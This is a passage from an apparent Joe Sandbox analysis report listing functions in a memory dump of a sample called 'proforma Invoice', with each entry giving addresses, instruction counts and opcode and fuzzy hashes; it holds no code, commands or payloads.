                                                                          • Instruction Fuzzy Hash: F1418375B20126BFDB15DF99CC84ABFBBFAAF84610F144069EA0497341D774DD408760
                                                                          Function 01160887 Relevance: .1, Instructions: 128COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e6bca535c526da09159720fb76ad722a0d93d84211136498f4a6348d4d89519
                                                                          • Instruction ID: 734d7fa5480d0f74bf7a5b9faef06a629a278667e8a8d15738450efcdc1a8958
                                                                          • Opcode Fuzzy Hash: 5e6bca535c526da09159720fb76ad722a0d93d84211136498f4a6348d4d89519
                                                                          • Instruction Fuzzy Hash: C141C2716007029FE72DCF28C490A66B7FEFF49314B144A6DE54B87A51E732E865CB90
                                                                          Function 0118A470 Relevance: .1, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d6d78f5c3ce776100532a6369e070d5e9151fe15258a1c34a086e0b4ef78892e
                                                                          • Instruction ID: 8c383864bea3b14b844acb929416e46597594641da7899402474fbbf0a2682de
                                                                          • Opcode Fuzzy Hash: d6d78f5c3ce776100532a6369e070d5e9151fe15258a1c34a086e0b4ef78892e
                                                                          • Instruction Fuzzy Hash: C341DC32900204CFDB2DEF6CE4987A9BBB0FF58314F45415AD411AB285EB309980CFA1
                                                                          Function 01168BF0 Relevance: .1, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 085db5bd4c7f7a7ba211553d87e74ebcfacf33f5f0dddd1787ef1ca06c085c0b
                                                                          • Instruction ID: fbf8be6bcf50461780742b11cf9a49282d3e8cd53fdd4b96e1366069766083c2
                                                                          • Opcode Fuzzy Hash: 085db5bd4c7f7a7ba211553d87e74ebcfacf33f5f0dddd1787ef1ca06c085c0b
                                                                          • Instruction Fuzzy Hash: 0741F572911342CBD72CDF4CD884A9AFBB9FFA4708F15812DD9015B259D776D842CBA0
                                                                          Function 01158918 Relevance: .1, Instructions: 123COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fff4e3be3c052933110666c06918d87d14a68cd47f5c19a0b38ca193c15070db
                                                                          • Instruction ID: 6a73f7e651efa6697893c66ab2f4dad01363f288590603c22dd78622a7c30356
                                                                          • Opcode Fuzzy Hash: fff4e3be3c052933110666c06918d87d14a68cd47f5c19a0b38ca193c15070db
                                                                          • Instruction Fuzzy Hash: 834159315087069EE316DF69C880AABF7E9EF88B54F41092AF994D7250E770DE058B93
                                                                          Function 0115A020 Relevance: .1, Instructions: 122COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                          • Instruction ID: a077b23ebd8828abf8a6454bb5d333b8710371b4767100a6c3229cab037e1169
                                                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                          • Instruction Fuzzy Hash: EB414731A08211EBDB2DDE28D4D07FABBA1EF50764F16816EED518B640D7328D80CB92
                                                                          Function 011609AD Relevance: .1, Instructions: 122COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1f99edac034d291a679acc96129dc900c53ec358ce711002395968d1f551b648
                                                                          • Instruction ID: 1f55c1bbb9c5602469d9f2b97057b8ef7a99c9dda33b8b1246ecd69543e73e42
                                                                          • Opcode Fuzzy Hash: 1f99edac034d291a679acc96129dc900c53ec358ce711002395968d1f551b648
                                                                          • Instruction Fuzzy Hash: 5A419C71640701EFD329CF18C840B6ABBF9FF58354F20866AE449CB251E772E952CB91
                                                                          Function 01190710 Relevance: .1, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                          • Instruction ID: dbd1cfed4c61a2c92c1003d166964b370e5768381feee4d8e35d88f0540a2401
                                                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                          • Instruction Fuzzy Hash: 0A413C75A00705EFDB28CF98C990AAABBF9FF18710B11496DE5A6DB650D330EA44CF50
                                                                          Function 0116262C Relevance: .1, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bd1a302c6a31b96d8467ce007c3d5752298bacffd31658176b964788bc426354
                                                                          • Instruction ID: 9f898ab02875fcb7bf7e820449882bbee40a2367bfeeb155ed08b7b095ca7d6f
                                                                          • Opcode Fuzzy Hash: bd1a302c6a31b96d8467ce007c3d5752298bacffd31658176b964788bc426354
                                                                          • Instruction Fuzzy Hash: 574104B0901701CFCB2DEF28D980B69B7F9FF54318F1182A9C8169B6A1EB319941CF51
                                                                          Function 0119C8F9 Relevance: .1, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8410185a3ede17ecd3fec5e0f87e16b63eb982b7b10b43dd4ba92396a3235d6f
                                                                          • Instruction ID: 20467f4fd6ccc35b3a0084c590462132cc8da629c4f4ae728c98026007a10477
                                                                          • Opcode Fuzzy Hash: 8410185a3ede17ecd3fec5e0f87e16b63eb982b7b10b43dd4ba92396a3235d6f
                                                                          • Instruction Fuzzy Hash: 68318CB1A00355DFDB19CF58C440799BBF0FB49718F2085AED119EB291E3369902CF90
                                                                          Function 011E07C3 Relevance: .1, Instructions: 114COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 80f57dec846052f4aaa14bc7f9207c229c7fbc00dec4035aaf232d7929f1ea6c
                                                                          • Instruction ID: 28ebb3a2cab58a7e51b3c6099da5832450454e5812f9d767b2a6bb39e49c90a1
                                                                          • Opcode Fuzzy Hash: 80f57dec846052f4aaa14bc7f9207c229c7fbc00dec4035aaf232d7929f1ea6c
                                                                          • Instruction Fuzzy Hash: 3441AE71A08301AFD724DF69C885F9BBBE8FF88624F004A2EF598D7250D7709904CB92
                                                                          Function 011E05A7 Relevance: .1, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3fe7ae81915f139e52c4600af153a3fbf4d5eb3a764fef8e2b935145ee7b470
                                                                          • Instruction ID: 0befc2b873109ad483bef87d55b57c616f5634c6d2ec0d57f79ddc32f70ffea2
                                                                          • Opcode Fuzzy Hash: a3fe7ae81915f139e52c4600af153a3fbf4d5eb3a764fef8e2b935145ee7b470
                                                                          • Instruction Fuzzy Hash: 2E41C372604A429FD328DFA8C844B6AB7E9FFCC700F140A1DF95597680E770E905CBA6
                                                                          Function 01164859 Relevance: .1, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b3266f2c5779e03c623583448b2ac02d45ebab5d306e54a6101848f478ad065c
                                                                          • Instruction ID: c7a70e9dc9193a9cb33c78d30c39b5d8dc97a2deeee23c14d4f5106edd2678dc
                                                                          • Opcode Fuzzy Hash: b3266f2c5779e03c623583448b2ac02d45ebab5d306e54a6101848f478ad065c
                                                                          • Instruction Fuzzy Hash: 0F41D3302443028FD72DDF28D894B2ABBEEEF84754F14442DEA558B691EB32D961CB91
                                                                          Function 011702E1 Relevance: .1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                          • Instruction ID: 157c0d7955cf89e568333d363686090f735c174a1a9cea2da04d71747cf93d5d
                                                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                          • Instruction Fuzzy Hash: A0312731A08344AFDB19CB68CC80B9BBFF9AF19350F0581A6F815D7352D7749844CBA5
                                                                          Function 01164260 Relevance: .1, Instructions: 102COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9c846d4e3ede5185b8f6c310ff4d0515228c7f58fad49f8efae6f458322e7373
                                                                          • Instruction ID: 7a7290fdd715f81ce8b20fbb055caebe5fb22e04e8daf50291dd0e8d9a58f217
                                                                          • Opcode Fuzzy Hash: 9c846d4e3ede5185b8f6c310ff4d0515228c7f58fad49f8efae6f458322e7373
                                                                          • Instruction Fuzzy Hash: 9041DF35200B45DFD72ACF28C980BE6BBEAAF58714F01842DF65A8B650D735E810CBA0
                                                                          Function 01200DF0 Relevance: .1, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                          • Instruction ID: cfdbf4b91206f1ff9c865d8a379491fd32078cc54c5ce9531507625ad61441f1
                                                                          • Opcode Fuzzy Hash: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                          • Instruction Fuzzy Hash: 1131E672115346AFE717DF14C801F6BBBACEB506A0F044A2EF95097292E770ED05CBA6
                                                                          Function 011DEB1D Relevance: .1, Instructions: 100COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0dd1a87cd797608c67afe35d6fd193b3ad628c46d5f47a5e00f252a882f97be0
                                                                          • Instruction ID: f7f5717eb8ddad915682bfe81f4ad1e1ce5eabe4969ab065b8bc4cc65ab2c0ca
                                                                          • Opcode Fuzzy Hash: 0dd1a87cd797608c67afe35d6fd193b3ad628c46d5f47a5e00f252a882f97be0
                                                                          • Instruction Fuzzy Hash: 6831C4327026829BF73E575CCD48B257BE8BF44B49F1D00A4AB459F6D2DB68E840C321
                                                                          Function 012261C3 Relevance: .1, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ec47bd274bfad08bc36f753f74f79a5458b0ed02163ec8b5707f5e03c27d6af3
                                                                          • Instruction ID: d893e6295db018eeda8fe9d03d1e7c17cea77393aca27087a46773f8062decd4
                                                                          • Opcode Fuzzy Hash: ec47bd274bfad08bc36f753f74f79a5458b0ed02163ec8b5707f5e03c27d6af3
                                                                          • Instruction Fuzzy Hash: 9131E476A10266BBDB15DF98CC40BAEB7B5FB45744F454268EA00AB244D7B0ED00CBA4
                                                                          Function 0120483A Relevance: .1, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 678cca88c394dc16c2b0cdb10b2b58773752bfd1b58f5274c2ffc0924e51b0df
                                                                          • Instruction ID: c90f421ca43c93de461f064b8cac20b8ae1aa79f5dd535757fe797ee469fc0d4
                                                                          • Opcode Fuzzy Hash: 678cca88c394dc16c2b0cdb10b2b58773752bfd1b58f5274c2ffc0924e51b0df
                                                                          • Instruction Fuzzy Hash: ED318936A5016DABCF22EF54DD44BDE7BB9AB98310F1041E5A608A7251CB30DE51CF90
                                                                          Function 0118EB20 Relevance: .1, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5948813924fea09aa305036af19e646bf3829e5e1a45989a80a8714276da96f4
                                                                          • Instruction ID: 2133a8f3c26c8400dc41744889856863f2af28579d891e3ae99b06dd791f522e
                                                                          • Opcode Fuzzy Hash: 5948813924fea09aa305036af19e646bf3829e5e1a45989a80a8714276da96f4
                                                                          • Instruction Fuzzy Hash: 7931B372E01215AFDB29EFA9CC40BAEBBF9EF54750F018426E516E7250D7709E018FA1
                                                                          Function 012260B8 Relevance: .1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5f792d9ba4e561656ca94858346d46d4bc7aa1fd0a47df42e1c02885fc7ab934
                                                                          • Instruction ID: f1483aaf6ac142c730509d7d2e9b83d2d4e96367d10c5e5b1d1a119b1039cf22
                                                                          • Opcode Fuzzy Hash: 5f792d9ba4e561656ca94858346d46d4bc7aa1fd0a47df42e1c02885fc7ab934
                                                                          • Instruction Fuzzy Hash: FF31D672B20626BBDB269F99C850B6EBBB5EF44754F200069E905DB352DB70ED018B90
                                                                          Function 011607AF Relevance: .1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3d76c97488cc591ef2c076bbcde2cf3e589707143df814054d73dbb0801a62bb
                                                                          • Instruction ID: 8e823bf84dd66c544128aea3a3db37b14570be1b705a5781ab414107e6944a6c
                                                                          • Opcode Fuzzy Hash: 3d76c97488cc591ef2c076bbcde2cf3e589707143df814054d73dbb0801a62bb
                                                                          • Instruction Fuzzy Hash: 9A31C832E05712DBC71EDE288880AABBBADEF98654F02452DFD5597310DB32DC2187D2
                                                                          Function 01168550 Relevance: .1, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a4c933715f87742125d35be3516fbfd0baa88d477a76282898f88857ae7a312f
                                                                          • Instruction ID: 18f4fdf1450449e4b29e593a3621153618ff65d63d0988b7517b539c82e3e0ea
                                                                          • Opcode Fuzzy Hash: a4c933715f87742125d35be3516fbfd0baa88d477a76282898f88857ae7a312f
                                                                          • Instruction Fuzzy Hash: 16318D716093018FE728CF19C840B2BFBE9FB98B00F05496EE98597351D7B1E954CB92
                                                                          Function 0119A6C7 Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                          • Instruction ID: 26fc76137a445e93d81669d9a37d8277e7cb1b33757ad379db59d5548130eda7
                                                                          • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                          • Instruction Fuzzy Hash: FF311C72B00B01AFDB69CF6DDD42B56BBF8AF08650F04092DA5AAC3651E731E904CB60
                                                                          Function 0120EBD0 Relevance: .1, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0cbfd89fe86d6e562ef3c5d3282c4463ad387678819e56211deb96edf49547c8
                                                                          • Instruction ID: f32b9e29edc966ea7f06c7c4e3facfdf5764dcbb3076f2e1a199b668b3885d85
                                                                          • Opcode Fuzzy Hash: 0cbfd89fe86d6e562ef3c5d3282c4463ad387678819e56211deb96edf49547c8
                                                                          • Instruction Fuzzy Hash: 8131EE71615302CFC716DF19C58095ABBF1FF89208F454AAEE9889B392D332D981CF82
                                                                          Function 0118438F Relevance: .1, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 21c2e1417b23e6eed8e7c297c63c703edf3ca86d8d2ad7fee29c4d213d7f78e2
                                                                          • Instruction ID: 7b54407221fd3f0bf449d38889919d928bf6f868af0db7626e92ecade784ef92
                                                                          • Opcode Fuzzy Hash: 21c2e1417b23e6eed8e7c297c63c703edf3ca86d8d2ad7fee29c4d213d7f78e2
                                                                          • Instruction Fuzzy Hash: 7231F471B002069FD728EFB8C885B6EBBFAAB90708F10C52AD105D3A50DB30D945CF90
                                                                          Function 0115CB7E Relevance: .1, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                          • Instruction ID: 55bd7eb0173f328c7cd58f9a4de32f76f888dde1b5457321080ab2aca6c67302
                                                                          • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                          • Instruction Fuzzy Hash: 7221F236E0525BAADB189FB98850BEFBBB9AF54740F068035DE25E7350E370D90087E1
                                                                          Function 0115C156 Relevance: .1, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d6a0c2876a9ea7b77509c2ea86c8025ca0d136dcc0fc47d36c75eafb02b33af8
                                                                          • Instruction ID: c62b827509d5f622f3c05d8520c2b5955fc3802a6f4c6c62d50b4830132c8c50
                                                                          • Opcode Fuzzy Hash: d6a0c2876a9ea7b77509c2ea86c8025ca0d136dcc0fc47d36c75eafb02b33af8
                                                                          • Instruction Fuzzy Hash: 903127B15003118BDB2DAF68D8C5BE977B4EF5031CF9481A9DD459B346EB349982CBA0
                                                                          Function 0121C3CD Relevance: .1, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                          • Instruction ID: 1e27a7ee0da11412b19ed2218e7e60f6aa7b1f7e4e1cf035a33aa2fa6d33dc78
                                                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                          • Instruction Fuzzy Hash: 5921203E69065266CF25DB958800BBAFBF5EF60714F40801AFAA587651E734D950C360
                                                                          Function 0115E420 Relevance: .1, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 18792926f561f94f2be60eaddc894816ca98b2f79d369aaabbe9209dfd2cb2cc
                                                                          • Instruction ID: c450641bee1908ec41c84ea641b2ece5606df48d2224b80726f84e46bea823dd
                                                                          • Opcode Fuzzy Hash: 18792926f561f94f2be60eaddc894816ca98b2f79d369aaabbe9209dfd2cb2cc
                                                                          • Instruction Fuzzy Hash: 3931C435E02128DBDB399F18CC41BEEBBB9AB15744F0100A1EA65E7290D7749F808F91
                                                                          Function 01194588 Relevance: .1, Instructions: 87COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                          • Instruction ID: e3b3667b4bc1e36d106b6e4654cea7cd4845f66185635b66e9e41e59574d116e
                                                                          • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                          • Instruction Fuzzy Hash: E9219171A00609EBCF19CF58CA80A8EBBB5FF48314F108169EE259B641D770EA06CBD0
                                                                          Function 011944B0 Relevance: .1, Instructions: 87COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 35aaac1a6ce28a81c32f2994b94d02869854ca7d464b131156b0acdcafbc362a
                                                                          • Instruction ID: 2dfbde20fb813cb24b70cdc667dd138e276f71e09d5fa597b6ad81bd7d136655
                                                                          • Opcode Fuzzy Hash: 35aaac1a6ce28a81c32f2994b94d02869854ca7d464b131156b0acdcafbc362a
                                                                          • Instruction Fuzzy Hash: C721E3726047459BDB2ADF58C980B6B77E4FF88720F014519FD649BA41C730E9028BA2
                                                                          Function 0115E388 Relevance: .1, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
